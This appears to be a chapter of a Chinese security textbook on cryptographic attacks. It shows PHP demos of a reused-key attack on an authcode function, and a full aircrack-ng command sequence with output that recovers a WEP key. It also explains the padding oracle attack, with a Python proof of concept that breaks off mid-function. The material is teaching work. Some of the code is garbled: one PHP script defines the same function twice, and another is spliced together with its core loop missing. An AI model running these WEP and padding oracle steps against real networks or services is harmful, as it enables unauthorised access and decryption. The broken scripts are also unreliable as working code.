
















攻击者可以选择不同的密文来解密。本章中所提到的“Padding Oracle Attack”就是一种选择密文攻击。


Stream Cipher Attack


Reused Key Attack

在流密码的使用中,最常见的错误便是使用同一个密钥进行多次加/解密。这将使得破解流密码变得非常简单。这种攻击被称为“Reused Key At-tack”,在这种攻击下,攻击者不需要知道密钥,即可还原出明文。


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E(A) = A xor C E(B) = B xor C


E(A) xor E(B)


1 2 3
E(A) xor E(B) = (A xor C) xor (B xor C) = A xor B xor C xor C = A xor B


E(A) xor E(B) = A xor B



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// $string: 明文 或 密文 // $operation:DECODE表示解密,其他表示加密 // $key: 密匙 // $expiry:密文有效期 //字符串解密/加密 function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) { // 动态密匙长度,相同的明文会生成不同密文就是依靠动态密匙 (初始化向量IV) $ckey_length = 4; // 随机密钥长度 取值 0~32 // 加入随机密钥,可以令密文无任何规律,即便是原文和密钥完全相同,加密结果也会每次不同 // 增大破解难度(实际上就是IV) // 取值越大,密文变动规律越大,密文变化 = 16 的 $ckey_length 次方 // 当此值为 0 时,则不产生随机密钥 // 密匙 $key = md5($key ? $key : UC_KEY); // 密匙a会参与加/解密 $keya = md5(substr($key, 0, 16)); // 密匙b会用来做数据完整性验证 $keyb = md5(substr($key, 16, 16)); // 密匙c用于变化生成的密文(初始化向量IV) $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length) : substr(md5(microtime()), -$ckey_length)) : ''; // 参与运算的密匙 $cryptkey = $keya.md5($keya.$keyc); $key_length = strlen($cryptkey); // 明文,前10位用来保存时间戳,解密时验证数据有效性,10到26位用来保存$keyb(密匙b) //解密时会通过这个密匙验证数据完整性 // 如果是解码的话,会从第$ckey_length位开始,因为密文前$ckey_length位保存动态密匙 //以保证解密正确 $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sp rintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string; $string_length = strlen($string); $result = ''; $box = range(0, 255); $rndkey = array(); // 产生密匙簿 for($i = 0; $i <= 255; $i++) { $rndkey[$i] = ord($cryptkey[$i % $key_length]); } // 用固定的算法,打乱密匙簿,增加随机性,好像很复杂,实际上并不会增加密文的强度 for($j = $i = 0; $i < 256; $i++) { $j = ($j + $box[$i] + $rndkey[$i]) % 256; $tmp = $box[$i]; $box[$i] = $box[$j]; $box[$j] = $tmp; } // 核心加/解密部分 for($a = $j = $i = 0; $i < $string_length; $i++) { $a = ($a + 1) % 256; $j = ($j + $box[$a]) % 256; $tmp = $box[$a]; $box[$a] = $box[$j]; $box[$j] = $tmp; // 从密匙簿得出密匙进行异或,再转成字符 $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256])); } if($operation == 'DECODE') { // 验证数据有效性,请看未加密明文的格式 if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) { return substr($result, 26); } else { return ''; } } else { // 把动态密匙保存在密文里,这也是为什么同样的明文,产生不同密文后能解密的原因 // 因为加密后的密文可能是一些特殊字符,复制过程可能会丢失,所以用base64编码 return $keyc.str_replace('=', '', base64_encode($result)); } }


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$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));


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function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) { $ckey_length = 4; $key = md5($key ? $key : UC_KEY); $keya = md5(substr($key, 0, 16)); $keyb = md5(substr($key, 16, 16));


authcode($plaintext, "ENCODE" , UC_KEY)



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$ckey_length = 4; …… $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : ''; $cryptkey = $keya.md5($keya.$keyc); $key_length = strlen($cryptkey); $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string; …… $rndkey = array(); for($i = 0; $i <= 255; $i++) { $rndkey[$i] = ord($cryptkey[$i % $key_length]); }


为了演示Reused Key Attack,暂且将ckey_length设置为0,这样就不会有初始化向量。下面为一段攻击的演示代码。

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<?php define('UC_KEY','aaaaaaaaaaaaaaaaaaaaaaaaaaa' ); $plaintext1 = "aaaabbbb"; $plaintext2 = "ccccbbbb"; echo "plaintext1 is: ".$plaintext1."<br>"; echo "plaintext2 is: ".$plaintext2."<br>"; $cipher1 = base64_decode(substr(authcode($plaintext1, "ENCODE" , UC_KEY), 0)); echo "Cipher1 is: ".hex($cipher1).'<br><br>'; $cipher2 = base64_decode(substr(authcode($plaintext2, "ENCODE" , UC_KEY), 0)); echo "Cipher2 is: ".hex($cipher2).'<br><br>'; function hex($str){ $result = ''; for ($i=0;$i<strlen($str);$i++){ $result .= "\\x".ord($str[$i]); } return $result; } echo "crack result is :".crack($plaintext1, $cipher1, $cipher2); function crack($plain, $cipher_p, $cipher_t){ $target = ''; $len = strlen($plain); $tmp_p = substr($cipher_p, 26); echo hex($tmp_p)."<br>"; $tmp_t = substr($cipher_t, 26); echo hex($tmp_t)."<br>"; for ($i=0;$i<strlen($plain);$i++){ $target .= chr(ord($plain[$i]) ^ ord($tmp_p[$i]) ^ ord($tmp_t[$i])); } return $target; } echo "crack result is :".crack($plaintext1, $cipher1, $cipher2); function crack($plain, $cipher_p, $cipher_t){ $target = ''; $len = strlen($plain); $tmp_p = substr($cipher_p, 26); echo hex($tmp_p)."<br>"; $tmp_t = substr($cipher_t, 26); echo hex($tmp_t)."<br>"; for ($i=0;$i<strlen($plain);$i++){ $target .= chr(ord($plain[$i]) ^ ord($tmp_p[$i]) ^ ord($tmp_t[$i])); } return $target; } function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) { //$ckey_length = 4; $ckey_length = 0; $key = md5($key ? $key : UC_KEY); $keya = md5(substr($key, 0, 16)); $keyb = md5(substr($key, 16, 16)); $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : ''; $cryptkey = $keya.md5($keya.$keyc); $key_length = strlen($cryptkey); $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string; $string_length = strlen($string); $result = ''; $box = range(0, 255); $rndkey = array(); for($i = 0; $i <= 255; $i++) { $rndkey[$i] = ord($cryptkey[$i % $key_length]); } for($j = $i = 0; $i < 256; $i++) { $j = ($j + $box[$i] + $rndkey[$i]) % 256; $tmp = $box[$i]; $box[$i] = $box[$j]; $box[$j] = $tmp; } $xx = ''; // real key for($a = $j = $i = 0; $i < $string_length; $i++) { $a = ($a + 1) % 256; $j = ($j + $box[$a]) % 256; $tmp = $box[$a]; $box[$a] = $box[$j]; $box[$j] = $tmp; $xx .= chr($box[($box[$a] + $box[$j]) % 256]); $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256])); } echo "xor key is: ".hex($xx)."<br>"; if($operation == 'DECODE') { if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) { return substr($result, 26); } else { return ''; } } else { return $keyc.str_replace('=', '', base64_encode($result)); } } ?>





E(A) xor E(B) = A xor B


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aaaabbbb XOR ‘\x227\x42\x31\x204\x251\x24\x114\x89’ XOR ‘\x225\x40\x29\x206\x251\x24\ x114\x89’ = ccccbbbb


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function crack($plain, $cipher_p, $cipher_t){ $target = ''; $len = strlen($plain); $tmp_p = substr($cipher_p, 26); echo hex($tmp_p)."<br>"; $tmp_t = substr($cipher_t, 26); echo hex($tmp_t)."<br>"; for ($i=0;$i<strlen($plain);$i++){ $target .= chr(ord($plain[$i]) ^ ord($tmp_p[$i]) ^ ord($tmp_t[$i])); } return $target; }

这里之所以能攻击成功,是因为第一次加密时使用的密钥和第二次使用的密钥相同,因此我们才能通过XOR运算还原出明文,形成 Reused KeyAttack。




$ckey_length = 4;


但如果IV不够随机,攻击者有可能找到相同的IV,则在相同IV的情况下仍然可以实施“Reused Key Attack”。在“WEP破解”一节中,就是找到了相同的IV,从而使得攻击成功。

Bit-flipping Attack


E(A) xor E(B) = A xor B


A xor E(A) xor B = E(B)





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(accountA+member) xor Cookie(A) xor (admin_account+manager) = Cookie(admin)

在密码学中,攻击者在不知道明文的情况下,通过改变密文,使得明文按其需要的方式发生改变的攻击方式,被称为Bit-flipping Attack。

解决Bit-flipping攻击的方法是验证密文的完整性,最常见的方法是增加带有KEY的MAC(消息验证码,Message Authentication Code),通过MAC验证密文是否被篡改。






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if($operation == 'DECODE') { if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26). $keyb), 0, 16)) { return substr($result, 26); } else { return ''; }



md5(substr($result, 26).$keyb)

这个值与两个因素有关,一个是真正的密文:substr($result, 26);一个是$keyb,而$keyb又是由加密密钥KEY变化得到的,因此在不知晓KEY的情况下,这个HMAC的值是无法伪造出来的。因此HMAC有效地保证了密文不会被篡改。



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<?php define('UC_KEY','aaaaaaaaaaaaaaaaaaaaaaaaaaa' ); $plaintext1 = "aaaabbbbxxxx"; $plaintext2 = "ccccbbbbcccc"; $guess_result = ""; $time_start = time(); $dict = array(); global $ckey_length; $ckey_length = 4; echo "Collecting Dictionary(XOR Keys).\n"; $cipher2 = authcode($plaintext2, "ENCODE" , UC_KEY); $counter = 0; for (;;){ $counter ++; $cipher1 = authcode($plaintext1, "ENCODE" , UC_KEY); $keyc1 = substr($cipher1, 0, $ckey_length); $cipher1 = base64_decode(substr($cipher1, $ckey_length)); $dict[$keyc1] = $cipher1; if ( $counter%1000 == 0){ echo "."; if ($guess_result = guess($dict, $cipher2)){ break; } } } array_unique($dict); echo "\nDictionary Collecting Finished..\n"; echo "Collected ".count($dict)." XOR Keys\n"; function guess($dict, $cipher2){ global $plaintext1,$ckey_length; $keyc2 = substr($cipher2, 0, $ckey_length); $cipher2 = base64_decode(substr($cipher2, $ckey_length)); for ($i=0; $i<count($dict); $i++){ if (array_key_exists($keyc2, $dict)){ echo "\nFound key in dictionary!\n"; echo "keyc is: ".$keyc2."\n"; return crack($plaintext1,$dict[$keyc2], $cipher2); break; } } return False; } echo "\ncounter is:".$counter."\n"; $time_spend = time() - $time_start; echo "crack time is: ".$time_spend." seconds \n"; echo "crack result is :".$guess_result."\n"; function crack($plain, $cipher_p, $cipher_t){ $target = ''; $tmp_p = substr($cipher_p, 26); //echo hex($tmp_p)."\n"; $tmp_t = substr($cipher_t, 26); //echo hex($tmp_t)."\n"; for ($i=0;$i<strlen($plain);$i++){ $target .= chr(ord($plain[$i]) ^ ord($tmp_p[$i]) ^ ord($tmp_t[$i])); } return $target; } function hex($str){ $result = ''; for ($i=0;$i<strlen($str);$i++){ $result .= "\\x".ord($str[$i]); } return $result; } function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) { global $ckey_length; //$ckey_length = 0; $key = md5($key ? $key : UC_KEY); $keya = md5(substr($key, 0, 16)); $keyb = md5(substr($key, 16, 16)); $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : ''; $cryptkey = $keya.md5($keya.$keyc); $key_length = strlen($cryptkey); $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string; $string_length = strlen($string); $result = ''; $box = range(0, 255); $rndkey = array(); for($i = 0; $i <= 255; $i++) { $rndkey[$i] = ord($cryptkey[$i % $key_length]); } for($j = $i = 0; $i < 256; $i++) { $j = ($j + $box[$i] + $rndkey[$i]) % 256; $tmp = $box[$i]; $box[$i] = $box[$j]; substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) { return substr($result, 26); } else { return ''; } } else { return $keyc.str_replace('=', '', base64_encode($result)); } } ?>


在大约16秒后,共遍历了19295个不同的XOR KEY,找到了相同的IV,顺利破解出明文。


流密码加密算法存在“Reused Key Attack”和“Bit-flipping Attack”等攻击方式。而在现实中,一种最著名的针对流密码的攻击可能就是WEP密钥的破解。WEP是一种常用的无线加密传输协议,破解了WEP的密钥,就可以以此密钥连接无线的Access Point。WEP采用RC4算法,也存在这两种攻击方式。



IV以明文的形式发送,在WEP中采用24bit的IV,但这其实不是很大的一个值。假设一个繁忙的AP,以11Mbps的速度发送大小为1500bytes的包,则15008/(1110^6)*2^24 = ~18000秒,约为5个小时。因此最多5个小时,IV就将耗光,不得不开始出现重复的IV。在实际情况中,并非每个包都有1500bytes大小,因此时间会更短。

IV一旦开始重复,就会使得“Reused Key At-tack”成为可能。同时通过收集大量的数据包,找到相同的IV,构造出相同的CRC-32校验值,也可以成功实施“Bit-flipping Attack”。

2001年8月,破解WEP的理论变得可行了。Berkly的Nikita Borisov, Ian Goldberg以及David Wagner共同完成了一篇很好的论文:“Se-curity of the WEP algorithm”,其中深入阐述了WEP破解的理论基础。



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root@segfault:/home/cg/eric-g# airodump-ng -- bssid 00:18:F8:F4:CF:E4 -c 9 ath2 -w eric-g CH 9 ][ Elapsed: 4 mins ][ 2007-11-21 23:08 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:18:F8:F4:CF:E4 21 21 2428 26251 0 9 48 WEP WEP OPN eric-G BSSID STATION PWR Lost Packets Probes 00:18:F8:F4:CF:E4 06:19:7E:8E:72:87 23 0 34189


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root@segfault:/home/cg/eric-g# aireplay-ng -1 600 -e eric-G -a 00:18:F8:F4:CF:E4 -h 06:19:7E:8E:72:87 ath2 22:53:23 Waiting for beacon frame (BSSID: 00:18:F8:F4:CF:E4) 22:53:23 Sending Authentication Request 22:53:23 Authentication successful 22:53:23 Sending Association Request 22:53:24 Association successful :-) 22:53:39 Sending keep-alive packet 22:53:54 Sending keep-alive packet 22:54:09 Sending keep-alive packet 22:54:24 Sending keep-alive packet 22:54:39 Sending keep-alive packet 22:54:54 Sending keep-alive packet 22:55:09 Sending keep-alive packet 22:55:24 Sending keep-alive packet 22:55:39 Sending keep-alive packet 22:55:54 Sending keep-alive packet 22:55:54 Got a deauthentication packet! 22:55:57 Sending Authentication Request 22:55:59 Sending Authentication Request 22:55:59 Authentication successful 22:55:59 Sending Association Request 22:55:59 Association successful :-) 22:56:14 Sending keep-alive packet ***KEEP THAT RUNNING


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root@segfault:/home/cg/eric-g# aireplay-ng -5 -b 00:18:F8:F4:CF:E4 -h 06:19:7E:8E:72:87 ath2 22:59:41 Waiting for a data packet... Read 873 packets... Size: 352, FromDS: 1, ToDS: 0 (WEP) BSSID = 00:18:F8:F4:CF:E4 Dest. MAC = 01:00:5E:7F:FF:FA Source MAC = 00:18:F8:F4:CF:E2 0x0000: 0842 0000 0100 5e7f fffa 0018 f8f4 cfe4 .B....^........ 0x0010: 0018 f8f4 cfe2 c0b5 121a 4600 0e18 0f3d ..........F....= 0x0020: bd80 8c41 de34 0437 8d2d c97f 2447 3d81 ...A.4.7.-.$G=. 0x0030: 9bdc 68da 06b2 18be 9cd6 9cb4 9443 8725 ..h..........C.% 0x0040: 87f6 9a14 1ff9 0cfa bd36 862e ec54 7215 .........6...Tr. 0x0050: 335b 4a91 d6a4 caae 5a58 a736 6230 87d9 3[J.....ZX.6b0.. 0x0060: 4e14 7617 21c6 eda4 9b0d 3a00 0b4f 47ab N.v.!.....:..OG. 0x0070: a529 dedf 4c13 880c a1e6 37f7 50e6 599c .)..L.....7.P.Y. 0x0080: 0a4c 0b7f 24ae b019 ef2f 36b9 c499 8643 .L.$..../6....C 0x0090: 6592 5835 23e5 c8e9 d1b9 3d36 1fe5 ecfe e.X5#.....=6.... 0x00a0: 510b 51ba 4fe4 e2ed d33b 0459 ca68 82b8 Q.Q.O....;.Y.h.. 0x00b0: c856 ea70 829f c753 1614 290e d051 392f .V.p...S..)..Q9/ 0x00c0: fa65 cbc6 c5f8 24b1 cdbd 94e5 08c3 2dd4 .e....$.......-. 0x00d0: 6e4b 983b dc82 b2cd b3f1 dab5 b816 6188 nK.;..........a. --- CUT --- Use this packet ? y Saving chosen packet in replay_src-1121-230028.cap 23:00:38 Data packet found! 23:00:38 Sending fragmented packet 23:00:38 Got RELAYED packet!! 23:00:38 Thats our ARP packet! 23:00:38 Trying to get 384 bytes of a keystream 23:00:38 Got RELAYED packet!! 23:00:38 Thats our ARP packet! 23:00:38 Trying to get 1500 bytes of a keystream 23:00:38 Got RELAYED packet!! 23:00:38 Thats our ARP packet! Saving keystream in fragment-1121-230038.xor Now you can build a packet with packetforge- ng out of that 1500 bytes keystream


1 2 3 4 5 6 7 8 9
root@segfault:/home/cg/eric-g# packetforge- ng -0 -a 00:18:F8:F4:CF:E4 -h 06:19:7E:8E:72:87 -k -l -w arp -y *.xor Wrote packet to: arp


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root@segfault:/home/cg/eric-g# aireplay-ng -2 -r arp -x 150 ath2 Size: 68, FromDS: 0, ToDS: 1 (WEP) BSSID = 00:18:F8:F4:CF:E4 Dest. MAC = FF:FF:FF:FF:FF:FF Source MAC = 06:19:7E:8E:72:87 0x0000: 0841 0201 0018 f8f4 cfe4 0619 7e8e 7287 .A..........~.r. 0x0010: ffff ffff ffff 8001 1f1a 4600 c9d3 e5e7 ..........F..... 0x0020: d65a 6a63 0b51 bb60 8390 a8b4 947d 456f .Zjc.Q.`.....}Eo 0x0030: 3a05 25b2 7464 7db7 c49b d38a f789 822c :.%.td}........, 0x0040: 83a8 93c5 .... Use this packet ? y Saving chosen packet in replay_src-1121-230224.cap


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cg@segfault:~/eric-g$ aircrack-ng -z eric- g-05.cap Opening eric-g-05.cap Read 64282 packets. # BSSID ESSID Encryption 1 00:18:F8:F4:CF:E4 eric-G WEP (21102 IVs) Choosing first network as target. Attack will be restarted every 5000 captured ivs. Starting PTW attack with 21397 ivs. Aircrack-ng 0.9.1 [00:00:11] Tested 78120/140000 keys (got 22918 IVs) KB depth byte(vote) 0 3/ 5 34( 111) 70( 109) 42( 107) 2C( 106) B9( 106) E3( 106) 1 1/ 14 34( 115) 92( 110) 35( 109) 53( 109) 33( 108) CD( 107) 2 6/ 18 91( 114) E7( 114) 21( 111) 0E( 110) 88( 109) C6( 109) 3 2/ 31 37( 109) 80( 109) 5F( 108) 92( 108) 9E( 108) 9B( 107) 4 0/ 2 29( 129) 55( 114) AD( 112) 6A( 111) BB( 110) C1( 110) KEY FOUND! [ 70:34:91:37:29 ] Decrypted correctly: 100%









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ecb_mode.py: from Crypto.Cipher import DES3 import binascii def hex_s(str): re = '' for i in range(0,len(str)): re += "\\x"+binascii.b2a_hex(str[i]) return re key = '1234567812345678' plain = 'aaaabbbbaaaabbbb' plain1 = 'xaaabbbbaaaabbbb' plain2 = 'aaaabbbbxaaabbbb' o = DES3.new(key, 1) # arg[1] == 1 means ECB MODE print "1 : "+hex_s(o.encrypt(plain)) print "2 : "+hex_s(o.encrypt(plain1)) print "3 : "+hex_s(o.encrypt(plain2))


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[root@vps tmp]#python ecb_mode.py 1 : \xab\xf1\x3a\x33\x59\x35\x3b\x07\xab \xf1\x3a\x33\x59\x35\x3b\x07 2 : \x32\xd1\xe9\x5a\x49\x0f\xfe\x80\xab \xf1\x3a\x33\x59\x35\x3b\x07 3 : \xab\xf1\x3a\x33\x59\x35\x3b \x07\x32\xd1\xe9\x5a\x49\x0f\xfe\x80




1 2 3
aaaabbbb aaaabbbb


1 2 3
\xab\xf1\x3a\x33\x59\x35\x3b\x07\xab\xf1\x3a \x33\x59\x35\x3b\x07


1 2 3
\xab\xf1\x3a\x33\x59\x35\x3b\x07 \xab\xf1\x3a\x33\x59\x35\x3b\x07



1 2 3
xaaabbbb aaaabbbb


1 2 3
\x32\xd1\xe9\x5a\x49\x0f\xfe\x80 \xab\xf1\x3a\x33\x59\x35\x3b\x07

对比plain加密后的密文,可以看到,仅仅block 1的密文不同,而block 2的密文是完全一样的。也就是说,block 1并未影响到block 2的结果。



1 2 3
aaaabbbb xaaabbbb


1 2 3
\xab\xf1\x3a\x33\x59\x35\x3b\x07 \x32\xd1\xe9\x5a\x49\x0f\xfe\x80











Padding Oracle Attack

在Eurocrypt 2002大会上,Vaudenay介绍了针对CBC模式的“Padding Oracle Attack”。它可以在不知道密钥的情况下,通过对padding bytes的尝试,还原明文,或者构造出任意明文的密文。

在2010年的BlackHat欧洲大会上,JulianoRizzo与Thai Duong介绍了“Padding Oracle”在实际中的攻击案例,并公布了ASP.NET存在的Padding Oracle问题。在2011年的Pwnie Re-wards中,ASP.NET的这个漏洞被评为“最具价值的服务器端漏洞”。

下面来看看Padding Oracle的原理,在此以DES为例。



比如明文是FIG,长度为3个字节,则剩下5个字节被填充了 0x05,0x05,0x05,0x05,0x05这5个相同的字节,每个字节的值等于需要填充的字节长度。如果明文长度刚好为8个字节,如:PLAN-TAIN,则后面需要填充8个字节的padding,其值为0x08。这种填充方法,遵循的是最常见的PKCS#5标准。





1 2 3
7B216A634951170FF851D6CC68FC9537858795A28ED4A AC6





在解密完成后,如果最后的padding值不正确,解密程序往往会抛出异常(padding error)。而利用应用的错误回显,攻击者往往可以判断出padding是否正确。

所以Padding Oracle实际上是一种边信道攻击,攻击者只需要知道密文的解密结果是否正确即可,而这往往有许多途径。


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Request: http://sampleapp/home.jsp? UID=0000000000000000F851D6CC68FC9537 Response: 500 - Internal Server Error



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1个字节的padding为 0x01 2个字节的padding为 0x02,0x02 3个字节的padding为 0x03,0x03,0x03 4个字节的padding为 0x04,0x04,0x04,0x04 ……

因此慢慢调整IV的值,以希望解密后,最后一个字节的值为正确的padding byte,比如一个0x01。

1 2 3 4 5
Request: http://sampleapp/home.jsp? UID=0000000000000001F851D6CC68FC9537 Response: 500 - Internal Server Error


因为Intermediary Value是固定的(我们此时 不知道Intermediary Value的值是多少),因此从0x00到0xFF之间,只可能有一个值与Intermedi-ary Value的最后一个字节进行XOR后,结果是0x01。通过遍历这255个值,可以找出IV需要的最后一个字节:

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Request: http://sampleapp/home.jsp? UID=000000000000003CF851D6CC68FC9537 Response: 200 OK

通过XOR运算,可以马上推导出此Interme-diary Byte的值:

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If [Intermediary Byte] ^ 0x3C == 0x01, then [Intermediary Byte] == 0x3C ^ 0x01, so [Intermediary Byte] == 0x3D

回过头看看加密过程:初始化向量IV与明文进行XOR运算得到了Intermediary Value,因此将刚才得到的Intermediary Byte:0x3D与真实IV的最后一个字节0x0F进行XOR运算,既能得到明文。

0x3D ^ 0x0F = 0x32


在正确匹配了padding “0x01”后,需要做的是继续推导出剩下的Intermediary Byte。根据padding的标准,当需要padding两个字节时,其值应该为0x02, 0x02。而我们已经知道了最后一个Intermediary Byte为0x3D,因此可以更新IV的第8个字节为0x3D ^ 0x02 = 0x3F,此时可以开始遍历IV的第7个字节(0x00~0xFF)。

通过遍历可以得出,IV的第7个字节为0x24,对应的Intermediary Byte为0x26。


获得Intermediary Value后,通过与原来的IV进行XOR运算,即可得到明文。在这个过程中,仅仅用到了密文和IV,通过对padding的推导,即可还原出明文,而不需要知道密钥是什么。而IV并不需要保密,它往往是以明文形式发送的。

如何通过Padding Oracle使得密文能够解密为任意明文呢?实际上通过前面的解密过程可以看出,通过改变IV,可以控制整个解密过程。因此在已经获得了 Intermediary Value 的情况下,很快就可以通过XOR运算得到可以生成任意明文的IV。

而对于多个分组的密文来说,从最后一组密文开始往前推。以两个分组为例,第二个分组使用的IV是第一个分组的密文(cipher text),因此当推导出第二个分组使用的IV时,将此IV值当做第一个分组的密文,再次进行推导。


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redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. """ import sys # https://www.dlitz.net/software/pycrypto/ from Crypto.Cipher import * import binascii # the key for encrypt/decrypt # we demo the poc here, so we need the key # in real attack, you can trigger encrypt/ decrypt in a complete blackbox env ENCKEY = 'abcdefgh' def main(args): print print "=== Padding Oracle Attack POC(CBC- MODE) ===" print "=== by axis ===" print "=== axis@ph4nt0m.org ===" print "=== 2011.9 ===" print ######################################## # you may config this part by yourself iv = '12345678' plain = 'aaaaaaaaaaaaaaaaX' plain_want = "opaas" # you can choose cipher: blowfish/AES/DES/ DES3/CAST/ARC2 cipher = "blowfish" ######################################## block_size = 8 if cipher.lower() == "aes": block_size = 16 if len(iv) != block_size: print "[-] IV must be "+str(block_size)+" bytes long(the same as block_size)!" return False print "=== Generate Target Ciphertext ===" ciphertext = encrypt(plain, iv, cipher) if not ciphertext: print "[-] Encrypt Error!" return False print "[+] plaintext is: "+plain print "[+] iv is: "+hex_s(iv) print "[+] ciphertext is: "+ hex_s(ciphertext) print print "=== Start Padding Oracle Decrypt ===" print print "[+] Choosing Cipher: "+cipher.upper() guess = padding_oracle_decrypt(cipher, ciphertext, iv, block_size) if guess: print "[+] Guess intermediary value is: "+hex_s(guess["intermediary"]) print "[+] plaintext = intermediary_value XOR original_IV" print "[+] Guess plaintext is: "+guess["plaintext"] print if plain_want: print "=== Start Padding Oracle Encrypt ===" print "[+] plaintext want to encrypt is: "+plain_want print "[+] Choosing Cipher: "+cipher.upper() en = padding_oracle_encrypt(cipher, ciphertext, plain_want, iv, block_size) if en: print "[+] Encrypt Success!" print "[+] The ciphertext you want is: "+hex_s(en[block_size:]) print "[+] IV is: "+hex_s(en[:block_size]) print print "=== Let's verify the custom encrypt result ===" print "[+] Decrypt of ciphertext '"+ hex_s(en[block_size:]) +"' is:" de = decrypt(en[block_size:], en[:block_size], cipher) if de == add_PKCS5_padding(plain_want, block_size): print de print "[+] Bingo!" else: print "[-] It seems something wrong happened!" return False return True else: return False def padding_oracle_encrypt(cipher, ciphertext, plaintext, iv, block_size=8): # the last block guess_cipher = ciphertext[0-block_size:] plaintext = add_PKCS5_padding(plaintext, block_size) print "[*] After padding, plaintext becomes to: "+hex_s(plaintext) print block = len(plaintext) iv_nouse = iv # no use here, in fact we only need intermediary prev_cipher = ciphertext[0-block_size:] # init with the last cipher block while block > 0: # we need the intermediary value tmp = padding_oracle_decrypt_block(cipher, prev_cipher, iv_nouse, block_size, debug=False) # calculate the iv, the iv is the ciphertext of the previous block prev_cipher = xor_str( plaintext[block- block_size:block], tmp["intermediary"] ) #save result guess_cipher = prev_cipher + guess_cipher block = block - block_size return guess_cipher def padding_oracle_decrypt(cipher, ciphertext, iv, block_size=8, debug=True): # split cipher into blocks; we will manipulate ciphertext block by block cipher_block = split_cipher_block(ciphertext, block_size) if cipher_block: result = {} result["intermediary"] = '' result["plaintext"] = '' counter = 0 for c in cipher_block: if debug: print "[*] Now try to decrypt block "+str(counter) print "[*] Block "+str(counter)+"'s ciphertext is: "+hex_s(c) print # padding oracle to each block guess = padding_oracle_decrypt_block(cipher, c, iv, block_size, debug) if guess: iv = c result["intermediary"] += guess["intermediary"] result["plaintext"] += guess["plaintext"] if debug: print print "[+] Block "+str(counter)+" decrypt!" print "[+] intermediary value is: "+hex_s(guess["intermediary"]) print "[+] The plaintext of block "+str(counter)+" is: "+guess["plaintext"] print counter = counter+1 else: print "[-] padding oracle decrypt error!" return False return result else: print "[-] ciphertext's block_size is incorrect!" return False def padding_oracle_decrypt_block(cipher, ciphertext, iv, block_size=8, debug=True): result = {} plain = '' intermediary = [] # list to save intermediary iv_p = [] # list to save the iv we found for i in range(1, block_size+1): iv_try = [] iv_p = change_iv(iv_p, intermediary, i) # construct iv # iv = \x00...(several 0 bytes) + \x0e(the bruteforce byte) + \xdc...(the iv bytes we found) for k in range(0, block_size-i): iv_try.append("\x00") # bruteforce iv byte for padding oracle # 1 bytes to bruteforce, then append the rest bytes iv_try.append("\x00") for b in range(0,256): iv_tmp = iv_try iv_tmp[len(iv_tmp)-1] = chr(b) iv_tmp_s = ''.join("%s" % ch for ch in iv_tmp) # append the result of iv, we've just calculate it, saved in iv_p for p in range(0,len(iv_p)): iv_tmp_s += iv_p[len(iv_p)-1-p] # in real attack, you have to replace this part to trigger the decrypt program #print hex_s(iv_tmp_s) # for debug plain = decrypt(ciphertext, iv_tmp_s, cipher) #print hex_s(plain) # for debug # got it! # in real attack, you have to replace this part to the padding error judgement if check_PKCS5_padding(plain, i): if debug: print "[*] Try IV: "+hex_s(iv_tmp_s) print "[*] Found padding oracle: " + hex_s(plain) iv_p.append(chr(b)) intermediary.append(chr(b ^ i)) break plain = '' for ch in range(0, len(intermediary)): plain += chr( ord(intermediary[len(intermediary)-1- ch]) ^ ord(iv[ch]) ) result["plaintext"] = plain result["intermediary"] = ''.join("%s" % ch for ch in intermediary)[::-1] return result # save the iv bytes found by padding oracle into a list def change_iv(iv_p, intermediary, p): for i in range(0, len(iv_p)): iv_p[i] = chr( ord(intermediary[i]) ^ p) return iv_p def split_cipher_block(ciphertext, block_size=8): if len(ciphertext) % block_size != 0: return False result = [] length = 0 while length < len(ciphertext): result.append(ciphertext[length:length +block_size]) length += block_size return result def check_PKCS5_padding(plain, p): if len(plain) % 8 != 0: return False # convert the string plain = plain[::-1] ch = 0 found = 0 while ch < p: if plain[ch] == chr(p): found += 1 ch += 1 if found == p: return True else: return False def add_PKCS5_padding(plaintext, block_size): s = '' if len(plaintext) % block_size == 0: return plaintext if len(plaintext) < block_size: padding = block_size - len(plaintext) else: padding = block_size - (len(plaintext) % block_size) for i in range(0, padding): plaintext += chr(padding) return plaintext def decrypt(ciphertext, iv, cipher): # we only need the padding error itself, not the key # you may gain padding error info in other ways # in real attack, you may trigger decrypt program # a 